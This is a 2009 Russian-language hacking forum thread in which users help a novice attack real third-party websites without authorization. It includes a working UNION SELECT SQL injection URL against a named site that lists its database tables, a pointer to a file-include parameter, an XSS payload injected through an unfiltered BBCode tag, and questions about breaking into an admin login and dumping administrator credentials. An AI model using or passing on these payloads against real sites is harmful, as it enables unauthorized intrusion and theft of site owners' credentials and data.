ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.05.2009, 17:12
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
navigat0r, похоже на скулю в ордере. Смотри линк в прикрепленной статье jokester`a.
|
|
|
14.05.2009, 17:20
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
$n@ke, скуля до ORDER BY, смотри запрос:
to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10
Число 4343, до ORDER BY, а не после.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
14.05.2009, 17:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
решил просканировать скуль сканером домены связанные с Голливудом)) (Сам я новичек в поиске уязвимостей, кроме азов). Ну так вот, сканер выдал вот это: http://hollywoodrivierarealestate.com/ (MSSQL Injection)
1.Я не понимаю что и как дальше искать.....Что посоветуете?
2. Нашел админку по адресу http://www.hollywoodwiretap.com/admin/login.php . Что посоветуете делать с ней, чтобы попасть внутрь))
|
|
|
|
14.05.2009, 18:01
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
Сканер должен был сказать в каком скрипте инъект!
Вот его и крути...по MSSQL Injection читать тут:
http://forum.antichat.ru/thread30501.html
2. ввести пароль)
Что я нашол беглым осмотром:
инклуд
Код:
http://www.hollywoodwiretap.com/?module='
На сервере включен magic_quotes так как даные слешируются... |
|
|
|
14.05.2009, 18:12
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
bug1z, а какой сканер посоветуешь?
|
|
|
|
14.05.2009, 18:21
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
NMAP или XSPIDER
Но помни, что пока лутший известный сканер - это человеческий мозг. Собери под него базу! (c)Elekt
Последний раз редактировалось bug1z; 14.05.2009 в 18:24..
|
|
|
|
14.05.2009, 18:28
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Скуля тоже есть вывод в тайтле
http://www.hollywoodwiretap.com/?module=news&action=page&category=-1+union+select+1,2,table_name,4,5,6+from+informati on_schema.tables
jecka3000, если ты новичок - самое глупое что можно сделать - юзать тупые сканеры. Читай статьи и учись искать уязвимости сам
|
|
|
|
14.05.2009, 19:01
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
Слушыл, что если вфоруме есть тег [php], то его как то можно использовать. Правдо ли то? Если да, то как его юзать
|
|
|
|
14.05.2009, 19:35
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
2Flair
Данный баг пашет не везде!
Давай разберёмся как он работает:
PHP код:
$row['text'] = str_replace('[php]','<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">', $row['text']);
$row['text'] = str_replace('[/p*hp]','</td></tr></table><br></font>', $row['text']);
То есть
[p*hp] заменяется на
PHP код:
<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">
а
[/php]
на закрытие тегов:
PHP код:
</td></tr></table><br></font>
То есть если нет фильтрации, то мы можем вставить свой код!
Пример:
[p*hp]<script>alert('lol')</script>[/p*hp]
В коде это будет выглядеть так:
PHP код:
<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Eia:</font></u></b></left><br><font color="#06499d"><script>alert('lol')</script></td></tr></table><br></font>
Последний раз редактировалось bug1z; 14.05.2009 в 19:40..
|
|
|
|
14.05.2009, 19:43
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
